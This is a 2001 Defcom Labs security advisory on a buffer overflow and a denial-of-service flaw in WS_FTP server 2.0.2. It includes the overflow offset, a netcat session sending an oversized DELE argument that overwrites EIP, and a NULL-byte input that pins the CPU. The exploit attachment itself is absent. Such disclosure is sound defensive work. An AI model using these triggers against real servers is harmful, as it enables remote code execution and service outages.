def-2001-28 - WS_FTP server 2.0.2 Buffer Overflow and possible DOS

[andreas junestam <andreas.junestam () defcom com>]

======================================================================
                  Defcom Labs Advisory def-2001-28

         WS_FTP server 2.0.2 Buffer Overflow and possible DOS

Author: Andreas Junestam <andreas () defcom com>
Co-Author: Janne Sarendal <janne () defcom com>
Release Date: 2001-07-26
======================================================================
------------------------=[Brief Description]=-------------------------
WS_FTP server 2.0.2 contains a buffer overflow which affects the
following commands:
* DELE
* MDTM
* MLST
* MKD
* RMD
* RNFR
* RNTO
* SIZE
* STAT
* XMKD
* XRMD
This buffer overflow gives an attacker the ability to run code on
the target with SYSTEM RIGHTS, due to the fact that the server runs
as a service by default. OBS: This is only valid when logged in as
an anonymous user, not an ordinary one.

The server also contains a easy-to-trigger DOS.

------------------------=[Affected Systems]=--------------------------
- WS_FTP server 2.0.2, havn't tested other versions

----------------------=[Detailed Description]=------------------------
* Command Buffer Overrun
  All the above mentioned commands seems to be using the same parsing
  code which suffers from a buffer overflow. By sending a command with
  an argument greater than 478 (474 bytes + new return address) bytes,
  a buffer will overflow and the EIP will be overwritten. A
  proof-of-concept exploit is attached to the advisory, which works
  against WS_FTP server 2.0.2 running on WIN2K (Professional and
  Server, any SP).

  C:\tools\web>nc -nvv 127.0.0.1 21
  (UNKNOWN) [127.0.0.1] 21 (?) open
  220-helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
  220-Tue Jun 19 14:00:21 2001
  220-30 days remaining on evaluation.
  220 helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
  user ftp
  331 Password required
  pass ftp
  230 user logged in
  DELE AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  Access violation - code c0000005 (first chance)
  eax=000000ea ebx=0067c278 ecx=000000ea edx=00000002 esi=0067c278
  edi=77fca3e0
  eip=41414141 esp=0104df88 ebp=41414141 iopl=0         nv up ei pl zr
  na po nc
  cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000            
  efl=00010246

* Possible DOS
  By sending a couple of NULL(0x0) characters, the WS_FTP Server
  will spike at 100% CPU.

---------------------------=[Workaround]=-----------------------------

Download the new version from:
http://www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html

-----------------------------=[Exploit]=------------------------------
See attached file, ws_ftp.pl

-------------------------=[Vendor Response]=--------------------------
This issue was brought to the vendors attention on the 18th of
June, 2001. Patch is released.

======================================================================
            This release was brought to you by Defcom Labs

              labs () defcom com             www.defcom.com
======================================================================

Attachment: ws_ftp.pl
Description: